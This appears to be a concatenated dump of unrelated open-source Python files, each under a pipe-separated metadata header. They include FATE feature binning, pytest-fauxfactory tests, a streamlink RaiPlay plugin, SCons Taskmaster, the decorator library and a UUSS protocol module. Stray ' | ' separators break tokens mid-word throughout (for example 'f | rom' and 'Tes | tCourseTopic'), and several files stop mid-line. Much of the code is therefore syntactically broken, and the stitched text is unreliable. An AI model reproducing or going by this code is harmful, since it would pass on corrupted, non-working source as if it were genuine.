return globMeanCost/len(self.posIni), globTimeCost/len(self.posIni)
def runTrajectoriesForResultsGenerationOnePoint(self, repeat, point):
xy = self.posIni[point]
costAll, trajTimeAll = np.zeros(repeat), np.zeros(repeat)
for i in range(repeat):
costAll[i], trajTimeAll[i] = self.runOneTrajectory(xy[0], xy[1])
meanCost = np.mean(costAll)
meanTrajTime = np.mean(trajTimeAll)
return meanCost, meanTrajTime
def runTrajectoriesForResultsGenerationOpti(self, repeat):
globMeanCost=0.
globTimeCost=0.
#pool=Pool()
costAll, trajTimeAll = np.zeros(repeat), np.zeros(repeat)
for xy in self.posIni:
for i in range(repeat):
costAll[i], trajTimeAll[i] = self.runOneTrajectoryOpti(xy[0], xy[1])
meanCost = np.mean(costAll)
meanTrajTime = np.mean(trajTimeAll)
self.costStore.append([xy[0], xy[1], meanCost])
self.trajTimeStore.append([xy[0], xy[1], meanTrajTime])
globMeanCost+=meanCost
globTimeCost+=meanTrajTime
#self.printLastCoordInfo()
size=len(self.posIni)
return globMeanCost/size, globTimeCost/size
def runTrajectoriesForResultsGenerationEstim(self, repeat):
globMeanCost=0.
globTimeCost=0.
#pool=Pool()
costAll, trajTimeAll = np.zeros(repeat), np.zeros(repeat)
for xy in self.posIni:
for i in range(repeat):
costAll[i], trajTimeAll[i] = self.runOneTrajectoryEstim(xy[0], xy[1])
meanCost = np.mean(costAll)
meanTrajTime = np.mean(trajTimeAll)
self.costStore.append([xy[0], xy[1], meanCost])
self.trajTimeStore.append([xy[0], xy[1], meanTrajTime])
globMeanCost+=meanCost
globTimeCost+=meanTrajTime
#self.printLastCoordInfo()
size=len(self.posIni)
return globMeanCost/size, globTimeCost/size
def runMultiProcessTrajectories(self, repeat):
pool=Pool(processes=len(self.posIni))
result = pool.map(partial(self.runNtrajectory, repeat=repeat) , [(x, y) for x, y in self.posIni])
pool.close()
|
FederatedAI/FATE | python/federatedml/feature/homo_feature_binning/homo_binning_base.py | Python | apache-2.0 | 9,934 | 0.003221 | #
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless | required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express | or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import numpy as np
from federatedml.util import LOGGER
from federatedml.feature.binning.base_binning import BaseBinning
from federatedml.framework import weights
from fate_arch.session import computing_session as session
from federatedml.param.feature_binning_param import HomoFeatureBinningParam
from federatedml.statistic.data_statistics import MultivariateStatisticalSummary
from federatedml.transfer_variable.transfer_class.homo_binning_transfer_variable import HomoBinningTransferVariable
from federatedml.util import consts
class SplitPointNode(object):
def __init__(self, value, min_value, max_value, aim_rank=None, allow_error_rank=0, last_rank=-1):
self.value = value
self.min_value = min_value
self.max_value = max_value
self.aim_rank = aim_rank
self.allow_error_rank = allow_error_rank
self.last_rank = last_rank
self.fixed = False
def set_aim_rank(self, rank):
self.aim_rank = rank
def create_right_new(self):
value = (self.value + self.max_value) / 2
if np.fabs(value - self.value) <= consts.FLOAT_ZERO * 0.1:
self.fixed = True
return self
min_value = self.value
return SplitPointNode(value, min_value, self.max_value, self.aim_rank, self.allow_error_rank)
def create_left_new(self):
value = (self.value + self.min_value) / 2
if np.fabs(value - self.value) <= consts.FLOAT_ZERO * 0.1:
self.fixed = True
return self
max_value = self.max_value
return SplitPointNode(value, self.min_value, max_value, self.aim_rank, self.allow_error_rank)
class RankArray(object):
def __init__(self, rank_array, error_rank, last_rank_array=None):
self.rank_array = rank_array
self.last_rank_array = last_rank_array
self.error_rank = error_rank
self.all_fix = False
self.fixed_array = np.zeros(len(self.rank_array), dtype=bool)
self._compare()
def _compare(self):
if self.last_rank_array is None:
return
else:
self.fixed_array = abs(self.rank_array - self.last_rank_array) < self.error_rank
assert isinstance(self.fixed_array, np.ndarray)
if (self.fixed_array == True).all():
self.all_fix = True
def __iadd__(self, other: 'RankArray'):
for idx, is_fixed in enumerate(self.fixed_array):
if not is_fixed:
self.rank_array[idx] += other.rank_array[idx]
self._compare()
return self
def __add__(self, other: 'RankArray'):
res_array = []
for idx, is_fixed in enumerate(self.fixed_array):
if not is_fixed:
res_array.append(self.rank_array[idx] + other.rank_array[idx])
else:
res_array.append(self.rank_array[idx])
return RankArray(np.array(res_array), self.error_rank, self.last_rank_array)
class Server(BaseBinning):
def __init__(self, params=None, abnormal_list=None):
super().__init__(params, abnormal_list)
# self.aggregator = secure_sum_aggregator.Server(enable_secure_aggregate=True)
self.aggregator = None
self.transfer_variable = HomoBinningTransferVariable()
self.suffix = None
def set_suffix(self, suffix):
self.suffix = suffix
def set_transfer_variable(self, variable):
self.transfer_variable = variable
def set_aggregator(self, aggregator):
self.aggregator = aggregator
def get_total_count(self):
total_count = self.aggregator.sum_model(suffix=(self.suffix, 'total_count'))
self.aggregator.send_aggregated_model(total_count, suffix=(self.suffix, 'total_count'))
return total_count
def get_missing_count(self):
missing_count = self.aggregator.sum_model(suffix=(self.suffix, 'missing_count'))
self.aggregator.send_aggregated_model(missing_count, suffix=(self.suffix, 'missing_count'))
return missing_count
def get_min_max(self):
local_values = self.transfer_variable.local_static_values.get(suffix=(self.suffix, "min-max"))
max_array, min_array = [], []
for local_max, local_min in local_values:
max_array.append(local_max)
min_array.append(local_min)
max_values = np.max(max_array, axis=0)
min_values = np.min(min_array, axis=0)
self.transfer_variable.global_static_values.remote((max_values, min_values),
suffix=(self.suffix, "min-max"))
return min_values, max_values
def query_values(self):
rank_weight = self.aggregator.aggregate_tables(suffix=(self.suffix, 'rank'))
self.aggregator.send_aggregated_tables(rank_weight, suffix=(self.suffix, 'rank'))
class Client(BaseBinning):
def __init__(self, params: HomoFeatureBinningParam = None, abnormal_list=None):
super().__init__(params, abnormal_list)
# self.aggregator = secure_sum_aggregator.Client(enable_secure_aggregate=True)
self.aggregator = None
self.transfer_variable = HomoBinningTransferVariable()
self.max_values, self.min_values = None, None
self.suffix = None
self.total_count = 0
def set_suffix(self, suffix):
self.suffix = suffix
def set_transfer_variable(self, variable):
self.transfer_variable = variable
def set_aggregator(self, aggregator):
self.aggregator = aggregator
def get_total_count(self, data_inst):
count = data_inst.count()
count_weight = weights.NumericWeights(count)
self.aggregator.send_model(count_weight, suffix=(self.suffix, 'total_count'))
total_count = self.aggregator.get_aggregated_model(suffix=(self.suffix, 'total_count')).unboxed
return total_count
def get_missing_count(self, summary_table):
missing_table = summary_table.mapValues(lambda x: x.missing_count)
missing_value_counts = dict(missing_table.collect())
missing_weight = weights.DictWeights(missing_value_counts)
self.aggregator.send_model(missing_weight, suffix=(self.suffix, 'missing_count'))
missing_counts = self.aggregator.get_aggregated_model(suffix=(self.suffix, 'missing_count')).unboxed
return missing_counts
def get_min_max(self, data_inst):
"""
Get max and min value of each selected columns
Returns:
max_values, min_values: dict
eg. {"x1": 10, "x2": 3, ... }
"""
if self.max_values and self.min_values:
return self.max_values, self.min_values
statistic_obj = MultivariateStatisticalSummary(data_inst,
cols_index=self.bin_inner_param.bin_indexes,
abnormal_list=self.abnormal_list,
error=self.params.error)
max_values = statistic_obj.get_max()
min_values = statistic_obj.get_min()
max_list = [max_values[x] for x in self.bin_inner_param.bin_names]
min_list = [min_values[x] for x in self.bin_inner_param.bin_names]
local_min_max_values = (max_list, min_list)
self.transfer_variable.local_static_values.remote(local_min_max_values,
suffix=(self.suffix, "min-max"))
self.max_values, self.min_values = self.transfer_variable.global_static_ |
mfalesni/pytest-fauxfactory | tests/test_faux_string.py | Python | gpl-3.0 | 5,253 | 0 | # -*- coding: utf-8 -*-
"""Test the `faux_string` mark."""
import pytest
def is_numeric(value):
"""Check if value is numeric."""
return value.isnumeric()
def contains_number(value):
"""Check to see if the string contains a number."""
return any(char.isnumeric() for char in value)
def test_mark_plain(testdir):
"""Check that mark `faux_string` adds 10 iterations to test."""
testdir.makepyfile("""
import pytest
@pytest.mark.faux_string(10)
def test_something(value):
assert 1 == 1
""")
result = testdir.runpytest()
result.assert_outcomes(passed=10)
assert result.ret == 0
def test_mark_correct_value(testdir):
"""Check that argument `value` is being used to pass random data."""
testdir.makepyfile("""
import pytest
@pytest.mark.faux_string(10)
def test_something(value):
| assert value
""")
result = testdir.runpytest()
result.assert_outcomes(passed=10)
assert result.ret == 0
def test_mark_incorrect_value(testdir):
"""Check that argument `value` is not being used."""
testdir.makepyfile("""
im | port pytest
@pytest.mark.faux_string(10)
def test_something(foo):
assert foo
""")
result = testdir.runpytest()
result.assert_outcomes(error=1)
assert 'uses no argument \'value\'' in result.stdout.str()
assert result.ret == 2
def test_mark_str_type_argument(testdir):
"""Check that passing only str_type argument works."""
testdir.makepyfile("""
import pytest
@pytest.mark.faux_string('alpha')
def test_something(value):
assert value
""")
result = testdir.runpytest()
result.assert_outcomes(passed=1)
assert result.ret == 0
def test_mark_incorrect_str_type_argument(testdir):
"""Check that passing incorrect str_type argument raises error."""
testdir.makepyfile("""
import pytest
@pytest.mark.faux_string('alphabet')
def test_something(value):
assert value
""")
result = testdir.runpytest()
result.assert_outcomes(error=1)
assert 'String type alphabet is not supported' in result.stdout.str()
assert result.ret == 2
def test_mark_incorrect_argument(testdir):
"""Check that first argument to mark is numeric."""
testdir.makepyfile("""
import pytest
@pytest.mark.faux_string('1')
def test_something(value):
assert value
""")
result = testdir.runpytest()
result.assert_outcomes(error=1)
assert 'String type 1 is not supported' in result.stdout.str()
assert result.ret == 2
def test_mark_invalid_integer(testdir):
"""Check that first argument to mark is valid integer."""
testdir.makepyfile("""
import pytest
@pytest.mark.faux_string(0)
def test_something(value):
assert value
""")
result = testdir.runpytest()
result.assert_outcomes(error=1)
assert 'Mark expected an integer greater than 0' in result.stdout.str()
assert result.ret == 2
@pytest.mark.faux_string()
def test_gen_alpha_string_with_no_arguments(value):
"""Passing no arguments should return a random string type."""
assert len(value) > 0
@pytest.mark.faux_string(1)
def test_gen_alpha_string_with_limit_arguments(value):
"""Passing limit argument should return a random string type."""
assert len(value) > 0
@pytest.mark.faux_string(4, 'alpha', length=12)
def test_gen_alpha_string_with_length(value):
"""Generate an `alpha` string of length 12."""
assert len(value) == 12
@pytest.mark.faux_string(
1,
'punctuation',
length=12,
validator=is_numeric,
default='1')
def test_gen_alpha_string_with_validator(value):
"""Call `faux_string` with validator that returns default of `1`."""
assert value == '1'
@pytest.mark.faux_string(4, 'alpha', length=[5, 15])
def test_gen_alpha_string_with_variable_length(value):
"""Generate an `alpha` string of length of either 5 or 15."""
assert len(value) == 5 or len(value) == 15
@pytest.mark.faux_string(4, [], length=[5, 30])
def test_gen_alpha_string_with_empty_types(value):
"""Generate default alpha strings with length 5 and 30 characters."""
assert len(value) >= 5
@pytest.mark.faux_string(4, ['alpha', 'alphanumeric'], length=[])
def test_gen_alpha_string_with_empty_length(value):
"""Generate default alpha strings with length as empty list."""
assert len(value) == 10
@pytest.mark.faux_string(4, [], length=[])
def test_gen_alpha_string_with_empty_types_and_length(value):
"""Generate default alpha strings with types and length as empty lists."""
assert len(value) >= 10
@pytest.mark.faux_string(4, ['alpha', 'numeric'], length=[5, 30])
def test_gen_alpha_string_with_variable_types(value):
"""Generate alpha strings with length 5, alphanumeric with length 30."""
if len(value) == 5:
assert not contains_number(value)
else:
assert contains_number(value)
@pytest.mark.faux_string(2, 'alpha', argnames='name')
def test_gen_alpha_string_with_custom_arg_name(name):
"""Generate default alpha strings with custom argument."""
assert len(name) == 10
|
chhe/streamlink | src/streamlink/plugins/raiplay.py | Python | bsd-2-clause | 1,786 | 0.00168 | """
$url raiplay.it
$type live
$region Italy
"""
import logging
import re
f | rom urllib.parse import urlparse, urlunparse
from streamlink.plugin import Plugin, pluginmatcher
from streamlink.plugin.api import validate
from streamlink.stream.hls import HLSStream
log = logging.getLogger(__name__)
class RaiPlayHLSStream(HLSStream):
@classmethod
def _get_variant_playlist(cls, res):
res.encoding = "UTF-8"
return super | ()._get_variant_playlist(res)
@pluginmatcher(re.compile(
r"https?://(?:www\.)?raiplay\.it/dirette/(\w+)/?"
))
class RaiPlay(Plugin):
_re_data = re.compile(r"data-video-json\s*=\s*\"([^\"]+)\"")
_schema_data = validate.Schema(
validate.transform(_re_data.search),
validate.any(None, validate.get(1))
)
_schema_json = validate.Schema(
validate.parse_json(),
validate.get("video"),
validate.get("content_url"),
validate.url()
)
def _get_streams(self):
json_url = self.session.http.get(self.url, schema=self._schema_data)
if not json_url:
return
json_url = urlunparse(urlparse(self.url)._replace(path=json_url))
log.debug("Found JSON URL: {0}".format(json_url))
stream_url = self.session.http.get(json_url, schema=self._schema_json)
log.debug("Found stream URL: {0}".format(stream_url))
res = self.session.http.request("HEAD", stream_url)
# status code will be 200 even if geo-blocked, so check the returned content-type
if not res or not res.headers or res.headers["Content-Type"] == "video/mp4":
log.error("Geo-restricted content")
return
yield from RaiPlayHLSStream.parse_variant_playlist(self.session, stream_url).items()
__plugin__ = RaiPlay
|
frappe/erpnext | erpnext/education/doctype/course_topic/test_course_topic.py | Python | gpl-3.0 | 154 | 0.006494 | # Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and | Contributors
# See license.txt
import unittest
class Tes | tCourseTopic(unittest.TestCase):
pass
|
afourmy/pyNMS | pyNMS/right_click_menus/network_general_menu.py | Python | gpl-3.0 | 1,562 | 0.007042 | # Copyright (C) 2017 Antoine Fourmy <antoine dot fourmy at gmail dot com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the i | mplied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Ge | neral Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from .general_menu import GeneralMenu
from .geographical_menu import GeographicalMenu
from miscellaneous.decorators import overrider
from PyQt5.QtWidgets import QMenu, QAction
class NetworkGeneralMenu(GeneralMenu, GeographicalMenu):
def __init__(self, event, controller):
super().__init__(event, controller)
# find networks
refresh = QAction('Refresh', self)
refresh.triggered.connect(self.refresh)
self.addAction(refresh)
self.addSeparator()
self.addAction(self.drawing_action)
self.addSeparator()
self.addAction(self.map_action)
@overrider(GeneralMenu)
def graph_drawing(self, drawing):
super().graph_drawing(drawing)
def remove_all_failures(self):
self.view.remove_failures()
def refresh(self):
self.project.refresh() |
tencent-wechat/phxsql | phxrpc_package_config/tools/phxsql_utils.py | Python | gpl-2.0 | 103 | 0.106796 | d | ef format_path( str ):
while( str.find( '//' ) != -1 ):
str = str.replace( '//', '/' )
ret | urn str
|
ict-felix/stack | vt_manager_kvm/src/python/vt_manager_kvm/communication/sfa/setUp/setup_config.py | Python | apache-2.0 | 416 | 0.036058 | AUTHORITY_XRN = 'ocf.ofam'
SUBJ | ECT = {'CN':'OfeliaSDKR1',
'C':'SP',
'ST':'Catalunya',
'L':'Barcelona',
'O':'i2CAT',
'OU':'DANA',
}
PARENT_SUBJECT = {'CN':'OfeliaSDKR1',
'C':'SP',
'ST':'Catalunya',
'L':'Barcelona',
'O':'i2CAT',
'OU':'DANA',
}
| |
stonekyx/binary | vendor/scons-local-2.3.4/SCons/Taskmaster.py | Python | gpl-3.0 | 40,520 | 0.002098 | #
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__doc__ = """
Generic Taskmaster module for the SCons build engine.
This module contains the primary interface(s) between a wrapping user
interface and the SCons build engine. There are two key classes here:
Taskmaster
This is the main engine for walking the dependency graph and
calling things to decide what does or doesn't need to be built.
Task
This is the base class for allowing a wrapping interface to
decide what does or doesn't actually need to be done. The
intention is for a wrapping interface to subclass this as
appropriate for different types of behavior it may need.
The canonical example is the SCons native Python interface,
which has Task subclasses that handle its specific behavior,
like printing "`foo' is up to date" when a top-level target
doesn't need to be built, and handling the -c option by removing
targets as its "build" action. There is also a separate subclass
for suppressing this output when the -q option is used.
The Taskmaster instantiates a Task object for each (set of)
target(s) that it decides need to be evaluated and/or built.
"""
__revision__ = "src/engine/SCons/Taskmaster.py 2014/09/27 12:51:43 garyo"
from itertools import chain
import operator
import sys
import traceback
import SCons.Errors
import SCons.Node
import SCons.Warnings
StateString = SCons.Node.StateString
NODE_NO_STATE = SCons.Node.no_state
NODE_PENDING = SCons.Node.pending
NODE_EXECUTING = SCons.Node.executing
NODE_UP_TO_DATE = SCons.Node.up_to_date
NODE_EXECUTED = SCons.Node.executed
NODE_FAILED = SCons.Node.failed
print_prepare = 0 # set by option --debug=prepare
# A subsystem for recording stats about how different Nodes are handled by
# the main Taskmaster loop. There's no external control here (no need for
# a --debug= option); enable it by changing the value of CollectStats.
CollectStats = None
class Stats(object):
"""
A simple class for holding statistics about the disposition of a
Node by the Taskmaster. If we're collecting statistics, each Node
processed by the Taskmaster gets one of these attached, in which case
the Taskmaster records its decision each time it processes the Node.
(Ideally, that's just once per Node.)
"""
def __init__(self):
"""
Instantiates a Taskmaster.Stats object, initializing all
appropriate counters to zero.
"""
self.considered = 0
self.already_handled = 0
self.problem = 0
self.child_failed = 0
self.not_built = 0
self.side_effects = 0
self.build = 0
StatsNodes = []
fmt = "%(considered)3d "\
"%(already_handled)3d " \
"%(problem)3d " \
"%(child_failed)3d " \
"%(not_built)3d " \
"%(side_effects)3d " \
"%(build)3d "
def dump_stats():
for n in sorted(StatsNodes, key=lambda a: str(a)):
print (fmt % n.stats.__dict__) + str(n)
class Task(object):
"""
Default SCons build engine task.
This controls the interaction of the actual building of node
and the rest of the engine.
This is expected to handle all of the normally-customizable
aspects of controlling a build, so any given application
*should* be able to do what it wants by sub-classing this
class and overriding methods as appropriate. If an application
needs to customze something by sub-classing Taskmaster (or
some other build engine class), we should first try to migrate
that functionality into this class.
Note that it's generally a good idea for sub-classes to call
these methods explicitly to update state, etc., rather than
roll their own interaction with Taskmaster from scratch.
"""
def __init__(self, tm, targets, top, node):
self.tm | = tm
self.targets = targets
self.top = top
self.node = node
self.exc_clear()
def trace_message(self, method, node, description='node'):
fmt = '%-20s %s % | s\n'
return fmt % (method + ':', description, self.tm.trace_node(node))
def display(self, message):
"""
Hook to allow the calling interface to display a message.
This hook gets called as part of preparing a task for execution
(that is, a Node to be built). As part of figuring out what Node
should be built next, the actually target list may be altered,
along with a message describing the alteration. The calling
interface can subclass Task and provide a concrete implementation
of this method to see those messages.
"""
pass
def prepare(self):
"""
Called just before the task is executed.
This is mainly intended to give the target Nodes a chance to
unlink underlying files and make all necessary directories before
the Action is actually called to build the targets.
"""
global print_prepare
T = self.tm.trace
if T: T.write(self.trace_message(u'Task.prepare()', self.node))
# Now that it's the appropriate time, give the TaskMaster a
# chance to raise any exceptions it encountered while preparing
# this task.
self.exception_raise()
if self.tm.message:
self.display(self.tm.message)
self.tm.message = None
# Let the targets take care of any necessary preparations.
# This includes verifying that all of the necessary sources
# and dependencies exist, removing the target file(s), etc.
#
# As of April 2008, the get_executor().prepare() method makes
# sure that all of the aggregate sources necessary to build this
# Task's target(s) exist in one up-front check. The individual
# target t.prepare() methods check that each target's explicit
# or implicit dependencies exists, and also initialize the
# .sconsign info.
executor = self.targets[0].get_executor()
if executor is None:
return
executor.prepare()
for t in executor.get_action_targets():
if print_prepare:
print "Preparing target %s..."%t
for s in t.side_effects:
print "...with side-effect %s..."%s
t.prepare()
for s in t.side_effects:
if print_prepare:
print "...Preparing side-effect %s..."%s
s.prepare()
def get_target(self):
"""Fetch the target being built or updated by this task.
"""
return self.node
def needs_execute(self):
# TODO(deprecate): "return True" is the old default behavior;
# change it to NotImplementedError (after running through the
# Deprecation Cycle) so the desired behavior is explicitly
# determined by which concrete subclass is used.
#raise NotImplementedError
msg = ('Taskmaster.Task is an abstract base class; i |
Bolton-and-Menk-GIS/restapi | restapi/decorator/__init__.py | Python | gpl-2.0 | 16,306 | 0.000736 | # ######################### LICENSE ############################ #
# Copyright (c) 2005-2015, Michele Simionato
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in bytecode form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDERS OR CONTRIBUTORS BE | LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREME | NT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
"""
Decorator module, see http://pypi.python.org/pypi/decorator
for the documentation.
"""
from __future__ import print_function
__version__ = '4.0.2'
import re
import sys
import inspect
import operator
import itertools
import collections
if sys.version >= '3':
from inspect import getfullargspec
def get_init(cls):
return cls.__init__
else:
class getfullargspec(object):
"A quick and dirty replacement for getfullargspec for Python 2.X"
def __init__(self, f):
self.args, self.varargs, self.varkw, self.defaults = \
inspect.getargspec(f)
self.kwonlyargs = []
self.kwonlydefaults = None
def __iter__(self):
yield self.args
yield self.varargs
yield self.varkw
yield self.defaults
getargspec = inspect.getargspec
def get_init(cls):
return cls.__init__.__func__
# getargspec has been deprecated in Python 3.5
ArgSpec = collections.namedtuple(
'ArgSpec', 'args varargs varkw defaults')
def getargspec(f):
"""A replacement for inspect.getargspec"""
spec = getfullargspec(f)
return ArgSpec(spec.args, spec.varargs, spec.varkw, spec.defaults)
DEF = re.compile('\s*def\s*([_\w][_\w\d]*)\s*\(')
# basic functionality
class FunctionMaker(object):
"""
An object with the ability to create functions with a given signature.
It has attributes name, doc, module, signature, defaults, dict and
methods update and make.
"""
def __init__(self, func=None, name=None, signature=None,
defaults=None, doc=None, module=None, funcdict=None):
self.shortsignature = signature
if func:
# func can be a class or a callable, but not an instance method
self.name = func.__name__
if self.name == '<lambda>': # small hack for lambda functions
self.name = '_lambda_'
self.doc = func.__doc__
self.module = func.__module__
if inspect.isfunction(func):
argspec = getfullargspec(func)
self.annotations = getattr(func, '__annotations__', {})
for a in ('args', 'varargs', 'varkw', 'defaults', 'kwonlyargs',
'kwonlydefaults'):
setattr(self, a, getattr(argspec, a))
for i, arg in enumerate(self.args):
setattr(self, 'arg%d' % i, arg)
if sys.version < '3': # easy way
self.shortsignature = self.signature = (
inspect.formatargspec(
formatvalue=lambda val: "", *argspec)[1:-1])
else: # Python 3 way
allargs = list(self.args)
allshortargs = list(self.args)
if self.varargs:
allargs.append('*' + self.varargs)
allshortargs.append('*' + self.varargs)
elif self.kwonlyargs:
allargs.append('*') # single star syntax
for a in self.kwonlyargs:
allargs.append('%s=None' % a)
allshortargs.append('%s=%s' % (a, a))
if self.varkw:
allargs.append('**' + self.varkw)
allshortargs.append('**' + self.varkw)
self.signature = ', '.join(allargs)
self.shortsignature = ', '.join(allshortargs)
self.dict = func.__dict__.copy()
# func=None happens when decorating a caller
if name:
self.name = name
if signature is not None:
self.signature = signature
if defaults:
self.defaults = defaults
if doc:
self.doc = doc
if module:
self.module = module
if funcdict:
self.dict = funcdict
# check existence required attributes
assert hasattr(self, 'name')
if not hasattr(self, 'signature'):
raise TypeError('You are decorating a non function: %s' % func)
def update(self, func, **kw):
"Update the signature of func with the data in self"
func.__name__ = self.name
func.__doc__ = getattr(self, 'doc', None)
func.__dict__ = getattr(self, 'dict', {})
func.__defaults__ = getattr(self, 'defaults', ())
func.__kwdefaults__ = getattr(self, 'kwonlydefaults', None)
func.__annotations__ = getattr(self, 'annotations', None)
try:
frame = sys._getframe(3)
except AttributeError: # for IronPython and similar implementations
callermodule = '?'
else:
callermodule = frame.f_globals.get('__name__', '?')
func.__module__ = getattr(self, 'module', callermodule)
func.__dict__.update(kw)
def make(self, src_templ, evaldict=None, addsource=False, **attrs):
"Make a new function from a given template and update the signature"
src = src_templ % vars(self) # expand name and signature
evaldict = evaldict or {}
mo = DEF.match(src)
if mo is None:
raise SyntaxError('not a valid function template\n%s' % src)
name = mo.group(1) # extract the function name
names = set([name] + [arg.strip(' *') for arg in
self.shortsignature.split(',')])
for n in names:
if n in ('_func_', '_call_'):
raise NameError('%s is overridden in\n%s' % (n, src))
if not src.endswith('\n'): # add a newline just for safety
src += '\n' # this is needed in old versions of Python
try:
code = compile(src, '<string>', 'single')
exec(code, evaldict)
except:
print('Error in generated code:', file=sys.stderr)
print(src, file=sys.stderr)
raise
func = evaldict[name]
if addsource:
attrs['__source__'] = src
self.update(func, **attrs)
return func
@classmethod
def create(cls, obj, body, evaldict, defaults=None,
doc=None, module=None, addsource=True, **attrs):
"""
Create a function from the strings name, signature and body.
evaldict is the evaluation dictionary. If addsource is true an
attribute __source__ is added to the result. The attributes attrs
are added, if any.
"""
if isinstanc |
brianr/uuss | proto.py | Python | mit | 17,229 | 0.003541 | import contextlib
from uuss.server import model
from lolapps.common import uums
from lolapps.util import json
import os
import simplejson
import struct
import time
try:
# Try importing the C++ extension version
import uuss_pb
except:
# The dynamic python version will automatically be used
pass
from uuss.uuss_pb2 import *
from uuss.server import model
from lolapps.common import uums
from lolapps.util.adapters import chunking
from lolapps.util import lolsocket
import logging
log = logging.getLogger(__name__)
class UUSSProtocolException(Exception):
pass
class UUSSShardDownException(UUSSProtocolException):
pass
class UUSSFailHealthcheckException(UUSSProtocolException):
pass
class UUSSAction(object):
"""
Base class for UUSS actions.
Note: the get_response and _call methods are set as @contextlib.contextmanager
in order for a get-with-lock to be able to use the with userstate.open mechanism
to ensure that the lock is released at the appropriate time.
"""
def __init | __(self):
self.Request = None
self.Response = No | ne
@contextlib.contextmanager
def get_response(self, protocol, req, config):
log.debug("UUSSAction.get_response start (%r, %r)", req.user_id, req.game)
userstate = getattr(model, req.game).userstate
log.debug("UUSSAction.get_response userstate: %r", userstate)
with self._call(protocol, userstate, req, config) as resp:
assert req.user_id == resp.user_id
assert req.game == resp.game
log.debug("UUSSAction.get_response pre-yield (%r, %r)", req.user_id, req.game)
yield resp
log.debug("UUSSAction.get_response post-yield (%r, %r)", req.user_id, req.game)
log.debug("UUSSAction.get_response end (%r, %r)", req.user_id, req.game)
@contextlib.contextmanager
def _call(self, protocol, userstate, req, config):
raise Exception('Implement me!')
## UUSS (UserState) Protocol ##
class Get(UUSSAction):
def __init__(self):
self.Request = GetRequest
self.Response = GetResponse
@contextlib.contextmanager
def _call(self, protocol, userstate, req, config):
log.debug("Get._call start (%r, %r)", req.user_id, req.game)
if req.lock:
# If a lock is requested we need to keep control within this 'with' block
# until we receive a ReleaseLock message but we also need to "return"
# the userstate requested. This is why this method and UUSSAction.get_response
# are contextmanagers. 'yield' allows us to return the value without
# leaving the 'with' block.
with userstate.open(
req.user_id,
create_if_missing=req.create_if_missing,
lock_timeout=req.lock_timeout,
max_wait=req.lock_max_wait,
label=req.lock_label,
raw=True
) as (state, chunked):
log.debug("Get._call pre-yield (%r, %r)", req.user_id, req.game)
yield self._build_response(state, chunked, req.game, req.user_id)
log.debug("Get._call post-yield (%r, %r)", req.user_id, req.game)
# we require a ReleaseLock message before we can leave this context and release the lock
self._wait_for_release_lock(protocol, req, config)
else:
(state, chunked) = userstate.get(req.user_id, req.create_if_missing, raw=True)
log.debug("Get._call pre-yield (%r, %r)", req.user_id, req.game)
yield self._build_response(state, chunked, req.game, req.user_id)
log.debug("Get._call post-yield (%r, %r)", req.user_id, req.game)
log.debug("Get._call end (%r, %r)", req.user_id, req.game)
def _wait_for_release_lock(self, protocol, get_req, config):
"""
Same as the normal server loop except that we will break once we get and process a ReleaseLock message.
@see server.connection.ConnectionHandler.run
"""
log.debug("Get._wait_for_release_lock start (%r, %r)", get_req.user_id, get_req.game)
while True:
log.debug("Get._wait_for_release_lock loop (%r, %r)", get_req.user_id, get_req.game)
(version, req) = protocol.recv_message()
if req.__class__ is ReleaseLock:
if req.game != get_req.game:
